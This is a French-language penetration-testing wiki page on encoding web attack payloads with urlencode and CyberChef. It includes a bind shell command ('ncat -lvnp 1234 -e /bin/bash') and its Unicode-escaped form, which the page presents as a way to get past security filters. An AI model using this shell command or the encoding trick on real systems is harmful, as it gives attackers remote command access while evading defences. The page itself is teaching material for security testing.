

# [Exploitation/Web] Encodage

## Introduction

Lors de vos attaques web vous aurez besoin d'encoder vos payloads sous divers formats. Cette page liste des outils qui vous permettront de le faire.

## Manuel

### Urlencode

Cet outil peut être installé sur les distributions Debian de cette façon :

```
apt install gridsite-clients
```

Il permet d'encoder au format URL vos payloads directement depuis le shell :

```
urlencode <STRING>
```

### Cyberchef

- <https://gchq.github.io/CyberChef/>

### Encodage Unicode

Cette technique permet de contourner certaines solutions de sécurité :

[Download CyberChef](#)

Last build: 2 years ago

[Options](#) [About / Support](#)

Operations

Unicode

Escape Unicode Characters

Normalise Unicode

Unescape Unicode Characters

Escape string

From Charcode

From Punycode

Regular expression

To Charcode

To Punycode

Recipe

Escape Unicode Characters

Prefix

\u

☒ Encode all chars

Padding

4

☒ Uppercase hex

STEP

BAKE!

☒ Auto Bake

Input

start: 28  
end: 28  
length: 0

length: 28  
lines: 1

ncat -lvnp 1234 -e /bin/bash

Output

time: 0ms  
length: 168  
lines: 1

\u006E\u0063\u0061\u0074\u0020\u002D\u006C\u0076\u006E  
\u0070\u0020\u0031\u0032\u0033\u0034\u0020\u002D\u0065  
\u002F\u0062\u0069\u006E\u002F\u0062\u0061\u0073\u0068

Revision #4

Created 4 March 2024 16:03:17 by Elieroc

Updated 3 May 2024 13:21:41 by Elieroc